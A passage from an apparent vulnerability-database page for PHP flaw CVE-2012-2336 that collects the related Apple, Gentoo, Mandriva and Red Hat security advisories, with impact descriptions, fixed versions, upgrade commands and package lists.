CVE-2011-4317
CVE-2012-0021
CVE-2012-0031
CVE-2012-0053
BIND
Available for: OS X Lion v10.7 to v10.7.4,
OS X Lion Server v10.7 to v10.7.4
Impact: A remote attacker may be able to cause a denial of service
in systems configured to run BIND as a DNS nameserver
Description: A reachable assertion issue existed in the handling of
DNS records. This issue was addressed by updating to BIND 9.7.6-P1.
This issue does not affect OS X Mountain Lion systems.
CVE-ID
CVE-2011-4313
BIND
Available for: OS X Lion v10.7 to v10.7.4,
OS X Lion Server v10.7 to v10.7.4,
OS X Mountain Lion v10.8 and v10.8.1
Impact: A remote attacker may be able to cause a denial of service,
data corruption, or obtain sensitive information from process memory
in systems configured to run BIND as a DNS nameserver
Description: A memory management issue existed in the handling of
DNS records. This issue was addressed by updating to BIND 9.7.6-P1 on
OS X Lion systems, and BIND 9.8.3-P1 on OS X Mountain Lion systems.
CVE-ID
CVE-2012-1667
CoreText
Available for: OS X Lion v10.7 to v10.7.4,
OS X Lion Server v10.7 to v10.7.4
Impact: Applications that use CoreText may be vulnerable to an
unexpected application termination or arbitrary code execution
Description: A bounds checking issue existed in the handling of text
glyphs, which may lead to out of bounds memory reads or writes. This
issue was addressed through improved bounds checking. This issue does
not affect Mac OS X v10.6 or OS X Mountain Lion systems.
CVE-ID
CVE-2012-3716 : Jesse Ruderman of Mozilla Corporation
Data Security
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4,
OS X Mountain Lion v10.8 and v10.8.1
Impact: An attacker with a privileged network position may intercept
user credentials or other sensitive information
Description: TrustWave, a trusted root CA, has issued, and
subsequently revoked, a sub-CA certificate from one of its trusted
anchors. This sub-CA facilitated the interception of communications
secured by Transport Layer Security (TLS). This update adds the
involved sub-CA certificate to OS X's list of untrusted certificates.
DirectoryService
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8
Impact: If the DirectoryService Proxy is used, a remote attacker may
cause a denial of service or arbitrary code execution
Description: A buffer overflow existed in the DirectoryService
Proxy. This issue was addressed through improved bounds checking.
This issue does not affect OS X Lion and Mountain Lion systems.
CVE-ID
CVE-2012-0650 : aazubel working with HP's Zero Day Initiative
ImageIO
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing a maliciously crafted PNG image may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in libpng's
handling of PNG images. These issues were addressed through improved
validation of PNG images. These issues do not affect OS X Mountain
Lion systems.
CVE-ID
CVE-2011-3026 : Juri Aedla
CVE-2011-3048
ImageIO
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing a maliciously crafted TIFF image may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow issue existed in libTIFF's handling
of TIFF images. This issue was addressed through improved validation
of TIFF images. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2012-1173 : Alexander Gavrun working with HP's Zero Day
Initiative
Installer
Available for: OS X Lion v10.7 to v10.7.4,
OS X Lion Server v10.7 to v10.7.4
Impact: Remote admins and persons with physical access to the system
may obtain account information
Description: The fix for CVE-2012-0652 in OS X Lion 10.7.4 prevented
user passwords from being recorded in the system log, but did not
remove the old log entries. This issue was addressed by deleting log
files that contained passwords. This issue does not affect Mac OS X
10.6 or OS X Mountain Lion systems.
CVE-ID
CVE-2012-0652
International Components for Unicode
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Applications that use ICU may be vulnerable to an unexpected
application termination or arbitrary code execution
Description: A stack buffer overflow existed in the handling of ICU
locale IDs. This issue was addressed through improved bounds
checking. This issue does not affect OS X Mountain Lion systems.
CVE-ID
CVE-2011-4599
Kernel
Available for: OS X Lion v10.7 to v10.7.4,
OS X Lion Server v10.7 to v10.7.4
Impact: A malicious program could bypass sandbox restrictions
Description: A logic issue existed in the handling of debug system
calls. This may allow a malicious program to gain code execution in
other programs with the same user privileges. This issue was
addressed by disabling handling of addresses in PT_STEP and
PT_CONTINUE. This issue does not affect OS X Mountain Lion systems.
CVE-ID
CVE-2012-0643 : iOS Jailbreak Dream Team
LoginWindow
Available for: OS X Mountain Lion v10.8 and v10.8.1
Impact: A local user may be able to obtain other user's login
passwords
Description: A user-installed input method could intercept password
keystrokes from Login Window or Screen Saver Unlock. This issue was
addressed by preventing user-installed methods from being used when
the system is handling login information.
CVE-ID
CVE-2012-3718 : An anonymous researcher
Mail
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing an e-mail message may lead to execution of web
plugins
Description: An input validation issue existed in Mail's handling of
embedded web plugins. This issue was addressed by disabling third-
party plug-ins in Mail. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2012-3719 : Will Dormann of the CERT/CC
Mobile Accounts
Available for: OS X Mountain Lion v10.8 and v10.8.1
Impact: A user with access to the contents of a mobile account may
obtain the account password
Description: Creating a mobile account saved a hash of the password
in the account, which was used to login when the mobile account was
used as an external account. The password hash could be used to
determine the user's password. This issue was addressed by creating
the password hash only if external accounts are enabled on the system
where the mobile account is created.
CVE-ID
CVE-2012-3720 : Harald Wagener of Google, Inc.
PHP
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4,
OS X Mountain Lion v10.8 and v10.8.1
Impact: Multiple vulnerabilities in PHP
Description: PHP is updated to version 5.3.15 to address multiple
vulnerabilities, the most serious of which may lead to arbitrary code
execution. Further information is available via the PHP web site at
http://www.php.net
CVE-ID
CVE-2012-0831
CVE-2012-1172
CVE-2012-1823
CVE-2012-2143
CVE-2012-2311
CVE-2012-2386
CVE-2012-2688
PHP
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: PHP scripts which use libpng may be vulnerable to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
PNG files. This issue was addressed by updating PHP's copy of libpng
to version 1.5.10. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2011-3048
Profile Manager
Available for: OS X Lion Server v10.7 to v10.7.4
Impact: An unauthenticated user could enumerate managed devices
Description: An authentication issue existed in the Device
Management private interface. This issue was addressed by removing
the interface. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2012-3721 : Derick Cassidy of XEquals Corporation
QuickLook
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing a maliciously crafted .pict file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
.pict files. This issue was addressed through improved validation of
.pict files. This issue does not affect OS X Mountain Lion systems.
CVE-ID
CVE-2012-0671 : Rodrigo Rubira Branco (twitter.com/bsdaemon) from the
Qualys Vulnerability & Malware Research Labs (VMRL)
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow existed in QuickTime's handling of
sean atoms. This issue was addressed through improved bounds
checking. This issue does not affect OS X Mountain Lion systems.
CVE-ID
CVE-2012-0670 : Tom Gallagher (Microsoft) and Paul Bates (Microsoft)
working with HP's Zero Day Initiative
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: An uninitialized memory access existed in the handling
of Sorenson encoded movie files. This issue was addressed through
improved memory initialization. This issue does not affect OS X
Mountain Lion systems.
CVE-ID
CVE-2012-3722 : Will Dormann of the CERT/CC
QuickTime
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in the handling of RLE
encoded movie files. This issue was addressed through improved bounds
checking. This issue does not affect OS X Mountain Lion systems.
CVE-ID
CVE-2012-0668 : Luigi Auriemma working with HP's Zero Day Initiative
Ruby
Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8,
OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of SSL
3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode.
The Ruby OpenSSL module disabled the 'empty fragment' countermeasure
which prevented these attacks. This issue was addressed by enabling
empty fragments. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2011-3389
USB
Available for: OS X Lion v10.7 to v10.7.4,
OS X Lion Server v10.7 to v10.7.4
Impact: Attaching a USB device may lead to an unexpected system
termination or arbitrary code execution
Description: A memory corruption issue existed in the handling of
USB hub descriptors. This issue was addressed through improved
handling of the bNbrPorts descriptor field. This issue does not
affect OS X Mountain Lion systems.
CVE-ID
CVE-2012-3723 : Andy Davis of NGS Secure
Note: OS X Mountain Lion v10.8.2 includes the content of
Safari 6.0.1. For further details see "About the security content
of Safari 6.0.1" at http://support.apple.com/kb/HT5502
OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 and Security Update
2012-004 may be obtained from the Software Update pane in System
Preferences, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
The Software Update utility will present the update that applies
to your system configuration. Only one is needed, either
OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 or Security Update
2012-004.
For OS X Mountain Lion v10.8.1
The download file is named: OSXUpd10.8.2.dmg
Its SHA-1 digest is: d6779e1cc748b78af0207499383b1859ffbebe33
For OS X Mountain Lion v10.8
The download file is named: OSXUpdCombo10.8.2.dmg
Its SHA-1 digest is: b08f10233d362e39f20b69f91d1d73f5e7b68a2c
For OS X Lion v10.7.4
The download file is named: MacOSXUpd10.7.5.dmg
Its SHA-1 digest is: e0a9582cce9896938a7a541bd431862d93893532
For OS X Lion v10.7 and v10.7.3
The download file is named: MacOSXUpdCombo10.7.5.dmg
Its SHA-1 digest is: f7a26b164fa10dae4fe646e57b01c34a619c8d9b
For OS X Lion Server v10.7.4
The download file is named: MacOSXServerUpd10.7.5.dmg
Its SHA-1 digest is: a891b03bfb4eecb745c0c39a32f39960fdb6796a
For OS X Lion Server v10.7 and v10.7.3
The download file is named: MacOSXServerUpdCombo10.7.5.dmg
Its SHA-1 digest is: df6e1748ab0a3c9e05c890be49d514673efd965e
For Mac OS X v10.6.8
The download file is named: SecUpd2012-004.dmg
Its SHA-1 digest is: 5b136e29a871d41012f0c6ea1362d6210c8b4fb7
For Mac OS X Server v10.6.8
The download file is named: SecUpdSrvr2012-004.dmg
Its SHA-1 digest is: 9b24496be15078e58a88537700f2f39c112e3b28
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
| VAR-201205-0312 | CVE-2012-2336 |
PHP Input validation error vulnerability
Related entries in the VARIoT exploits database: VAR-E-201112-0006, VAR-E-201112-0007, VAR-E-201112-0002, VAR-E-201112-0008 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to cause a denial of service (resource consumption) by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'T' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823. PHP is prone to an information-disclosure vulnerability.
Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201209-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: PHP: Multiple vulnerabilities
Date: September 24, 2012
Bugs: #384301, #396311, #396533, #399247, #399567, #399573,
#401997, #410957, #414553, #421489, #427354, #429630
ID: 201209-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities were found in PHP, the worst of which lead to
remote execution of arbitrary code.
Background
==========
PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML.
Affected packages
=================
-------------------------------------------------------------------
     Package              /     Vulnerable     /        Unaffected
-------------------------------------------------------------------
  1  dev-lang/php               < 5.3.15                >= 5.3.15
                                < 5.4.5                 >= 5.4.5
-------------------------------------------------------------------
# Package 1 only applies to users of these architectures:
arm
Description
===========
Multiple vulnerabilities have been discovered in PHP. Please review the
CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All PHP users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.3.15"
All PHP users on ARM should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.4.5"
References
==========
[ 1 ] CVE-2011-1398
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1398
[ 2 ] CVE-2011-3379
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3379
[ 3 ] CVE-2011-4566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4566
[ 4 ] CVE-2011-4885
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4885
[ 5 ] CVE-2012-0057
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0057
[ 6 ] CVE-2012-0788
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0788
[ 7 ] CVE-2012-0789
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0789
[ 8 ] CVE-2012-0830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0830
[ 9 ] CVE-2012-0831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0831
[ 10 ] CVE-2012-1172
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1172
[ 11 ] CVE-2012-1823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1823
[ 12 ] CVE-2012-2143
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2143
[ 13 ] CVE-2012-2311
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2311
[ 14 ] CVE-2012-2335
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2335
[ 15 ] CVE-2012-2336
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2336
[ 16 ] CVE-2012-2386
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2386
[ 17 ] CVE-2012-2688
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2688
[ 18 ] CVE-2012-3365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3365
[ 19 ] CVE-2012-3450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3450
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201209-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Please refer to the following Mandriva
advisories for further information:
MDVA-2012:004, MDVSA-2011:165, MDVSA-2011:166, MDVSA-2011:180,
MDVSA-2011:197, MDVSA-2012:065, MDVSA-2012:068, MDVSA-2012:068-1.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1148
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1657
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2202
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3182
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3267
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3268
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3379
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4566
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4885
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0788
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0807
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0830
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0831
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1172
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2335
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2336
http://www.mandriva.com/security/advisories?name=MDVA-2012:004
http://www.mandriva.com/security/advisories?name=MDVSA-2011:165
http://www.mandriva.com/security/advisories?name=MDVSA-2011:166
http://www.mandriva.com/security/advisories?name=MDVSA-2011:180
http://www.mandriva.com/security/advisories?name=MDVSA-2011:197
http://www.mandriva.com/security/advisories?name=MDVSA-2012:065
http://www.mandriva.com/security/advisories?name=MDVSA-2012:068
http://www.mandriva.com/security/advisories?name=MDVSA-2012:068-1
_______________________________________________________________________
Updated Packages:
Mandriva Enterprise Server 5:
Mandriva Enterprise Server 5/X86_64:
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: php security update
Advisory ID: RHSA-2012:1046-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-1046.html
Issue date: 2012-06-27
CVE Names: CVE-2010-2950 CVE-2011-4153 CVE-2012-0057
CVE-2012-0781 CVE-2012-0789 CVE-2012-1172
CVE-2012-2143 CVE-2012-2336 CVE-2012-2386
=====================================================================
1. Summary:
Updated php packages that fix multiple security issues are now available
for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having moderate
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. Description:
PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Server.
It was discovered that the PHP XSL extension did not restrict the file
writing capability of libxslt. A remote attacker could use this flaw to
create or overwrite an arbitrary file that is writable by the user running
PHP, if a PHP script processed untrusted eXtensible Style Sheet Language
Transformations (XSLT) content. (CVE-2012-0057)
Note: This update disables file writing by default. A new PHP configuration
directive, "xsl.security_prefs", can be used to enable file writing in
XSLT.
A flaw was found in the way PHP validated file names in file upload
requests. A remote attacker could possibly use this flaw to bypass the
sanitization of the uploaded file names, and cause a PHP script to store
the uploaded file in an unexpected directory, by using a directory
traversal attack. (CVE-2012-1172)
Multiple integer overflow flaws, leading to heap-based buffer overflows,
were found in the way the PHP phar extension processed certain fields of
tar archive files. A remote attacker could provide a specially-crafted tar
archive file that, when processed by a PHP application using the phar
extension, could cause the application to crash or, potentially, execute
arbitrary code with the privileges of the user running PHP. (CVE-2012-2386)
A format string flaw was found in the way the PHP phar extension processed
certain PHAR files. A remote attacker could provide a specially-crafted
PHAR file, which once processed in a PHP application using the phar
extension, could lead to information disclosure and possibly arbitrary code
execution via a crafted phar:// URI. (CVE-2010-2950)
A flaw was found in the DES algorithm implementation in the crypt()
password hashing function in PHP. If the password string to be hashed
contained certain characters, the remainder of the string was ignored when
calculating the hash, significantly reducing the password strength.
(CVE-2012-2143)
Note: With this update, passwords are no longer truncated when performing
DES hashing. Therefore, new hashes of the affected passwords will not match
stored hashes generated using vulnerable PHP versions, and will need to be
updated.
It was discovered that the fix for CVE-2012-1823, released via
RHSA-2012:0546, did not properly filter all php-cgi command line arguments.
A specially-crafted request to a PHP script could cause the PHP interpreter
to execute the script in a loop, or output usage information that triggers
an Internal Server Error. (CVE-2012-2336)
A memory leak flaw was found in the PHP strtotime() function call. A remote
attacker could possibly use this flaw to cause excessive memory consumption
by triggering many strtotime() function calls. (CVE-2012-0789)
A NULL pointer dereference flaw was found in the PHP tidy_diagnose()
function. A remote attacker could use specially-crafted input to crash an
application that uses tidy::diagnose. (CVE-2012-0781)
It was found that PHP did not check the zend_strndup() function's return
value in certain cases. A remote attacker could possibly use this flaw to
crash a PHP application. (CVE-2011-4153)
Upstream acknowledges Rubin Xu and Joseph Bonneau as the original reporters
of CVE-2012-2143.
All php users should upgrade to these updated packages, which contain
backported patches to resolve these issues. After installing the updated
packages, the httpd daemon must be restarted for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
782657 - CVE-2012-0057 php: XSLT file writing vulnerability
782943 - CVE-2011-4153 php: zend_strndup() NULL pointer dereference may cause DoS
782951 - CVE-2012-0781 php: tidy_diagnose() NULL pointer dereference may cause DoS
783609 - CVE-2012-0789 php: strtotime timezone memory leak
799187 - CVE-2012-1172 php: $_FILES array indexes corruption
816956 - CVE-2012-2143 BSD crypt(): DES encrypted password weakness
820708 - CVE-2012-2336 php: incomplete CVE-2012-1823 fix - missing filtering of -T and -h
823594 - CVE-2012-2386 php: Integer overflow leading to heap-buffer overflow in the Phar extension
835024 - CVE-2010-2950 php: Format string flaw in phar extension via phar_stream_flush() (MOPS-2010-024)
6. Package List:
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm
i386:
php-5.3.3-14.el6_3.i686.rpm
php-bcmath-5.3.3-14.el6_3.i686.rpm
php-cli-5.3.3-14.el6_3.i686.rpm
php-common-5.3.3-14.el6_3.i686.rpm
php-dba-5.3.3-14.el6_3.i686.rpm
php-debuginfo-5.3.3-14.el6_3.i686.rpm
php-devel-5.3.3-14.el6_3.i686.rpm
php-embedded-5.3.3-14.el6_3.i686.rpm
php-enchant-5.3.3-14.el6_3.i686.rpm
php-gd-5.3.3-14.el6_3.i686.rpm
php-imap-5.3.3-14.el6_3.i686.rpm
php-intl-5.3.3-14.el6_3.i686.rpm
php-ldap-5.3.3-14.el6_3.i686.rpm
php-mbstring-5.3.3-14.el6_3.i686.rpm
php-mysql-5.3.3-14.el6_3.i686.rpm
php-odbc-5.3.3-14.el6_3.i686.rpm
php-pdo-5.3.3-14.el6_3.i686.rpm
php-pgsql-5.3.3-14.el6_3.i686.rpm
php-process-5.3.3-14.el6_3.i686.rpm
php-pspell-5.3.3-14.el6_3.i686.rpm
php-recode-5.3.3-14.el6_3.i686.rpm
php-snmp-5.3.3-14.el6_3.i686.rpm
php-soap-5.3.3-14.el6_3.i686.rpm
php-tidy-5.3.3-14.el6_3.i686.rpm
php-xml-5.3.3-14.el6_3.i686.rpm
php-xmlrpc-5.3.3-14.el6_3.i686.rpm
php-zts-5.3.3-14.el6_3.i686.rpm
x86_64:
php-5.3.3-14.el6_3.x86_64.rpm
php-bcmath-5.3.3-14.el6_3.x86_64.rpm
php-cli-5.3.3-14.el6_3.x86_64.rpm
php-common-5.3.3-14.el6_3.x86_64.rpm
php-dba-5.3.3-14.el6_3.x86_64.rpm
php-debuginfo-5.3.3-14.el6_3.x86_64.rpm
php-devel-5.3.3-14.el6_3.x86_64.rpm
php-embedded-5.3.3-14.el6_3.x86_64.rpm
php-enchant-5.3.3-14.el6_3.x86_64.rpm
php-gd-5.3.3-14.el6_3.x86_64.rpm
php-imap-5.3.3-14.el6_3.x86_64.rpm
php-intl-5.3.3-14.el6_3.x86_64.rpm
php-ldap-5.3.3-14.el6_3.x86_64.rpm
php-mbstring-5.3.3-14.el6_3.x86_64.rpm
php-mysql-5.3.3-14.el6_3.x86_64.rpm
php-odbc-5.3.3-14.el6_3.x86_64.rpm
php-pdo-5.3.3-14.el6_3.x86_64.rpm
php-pgsql-5.3.3-14.el6_3.x86_64.rpm
php-process-5.3.3-14.el6_3.x86_64.rpm
php-pspell-5.3.3-14.el6_3.x86_64.rpm
php-recode-5.3.3-14.el6_3.x86_64.rpm
php-snmp-5.3.3-14.el6_3.x86_64.rpm
php-soap-5.3.3-14.el6_3.x86_64.rpm
php-tidy-5.3.3-14.el6_3.x86_64.rpm
php-xml-5.3.3-14.el6_3.x86_64.rpm
php-xmlrpc-5.3.3-14.el6_3.x86_64.rpm
php-zts-5.3.3-14.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm
x86_64:
php-cli-5.3.3-14.el6_3.x86_64.rpm
php-common-5.3.3-14.el6_3.x86_64.rpm
php-debuginfo-5.3.3-14.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm
x86_64:
php-5.3.3-14.el6_3.x86_64.rpm
php-bcmath-5.3.3-14.el6_3.x86_64.rpm
php-dba-5.3.3-14.el6_3.x86_64.rpm
php-debuginfo-5.3.3-14.el6_3.x86_64.rpm
php-devel-5.3.3-14.el6_3.x86_64.rpm
php-embedded-5.3.3-14.el6_3.x86_64.rpm
php-enchant-5.3.3-14.el6_3.x86_64.rpm
php-gd-5.3.3-14.el6_3.x86_64.rpm
php-imap-5.3.3-14.el6_3.x86_64.rpm
php-intl-5.3.3-14.el6_3.x86_64.rpm
php-ldap-5.3.3-14.el6_3.x86_64.rpm
php-mbstring-5.3.3-14.el6_3.x86_64.rpm
php-mysql-5.3.3-14.el6_3.x86_64.rpm
php-odbc-5.3.3-14.el6_3.x86_64.rpm
php-pdo-5.3.3-14.el6_3.x86_64.rpm
php-pgsql-5.3.3-14.el6_3.x86_64.rpm
php-process-5.3.3-14.el6_3.x86_64.rpm
php-pspell-5.3.3-14.el6_3.x86_64.rpm
php-recode-5.3.3-14.el6_3.x86_64.rpm
php-snmp-5.3.3-14.el6_3.x86_64.rpm
php-soap-5.3.3-14.el6_3.x86_64.rpm
php-tidy-5.3.3-14.el6_3.x86_64.rpm
php-xml-5.3.3-14.el6_3.x86_64.rpm
php-xmlrpc-5.3.3-14.el6_3.x86_64.rpm
php-zts-5.3.3-14.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/php-5.3.3-14.el6_3.src.rpm
i386:
php-5.3.3-14.el6_3.i686.rpm
php-cli-5.3.3-14.el6_3.i686.rpm
php-common-5.3.3-14.el6_3.i686.rpm
php-debuginfo-5.3.3-14.el6_3.i686.rpm
php-gd-5.3.3-14.el6_3.i686.rpm
php-ldap-5.3.3-14.el6_3.i686.rpm
php-mysql-5.3.3-14.el6_3.i686.rpm
php-odbc-5.3.3-14.el6_3.i686.rpm
php-pdo-5.3.3-14.el6_3.i686.rpm
php-pgsql-5.3.3-14.el6_3.i686.rpm
php-soap-5.3.3-14.el6_3.i686.rpm
php-xml-5.3.3-14.el6_3.i686.rpm
php-xmlrpc-5.3.3-14.el6_3.i686.rpm
ppc64:
php-5.3.3-14.el6_3.ppc64.rpm
php-cli-5.3.3-14.el6_3.ppc64.rpm
php-common-5.3.3-14.el6_3.ppc64.rpm
php-debuginfo-5.3.3-14.el6_3.ppc64.rpm
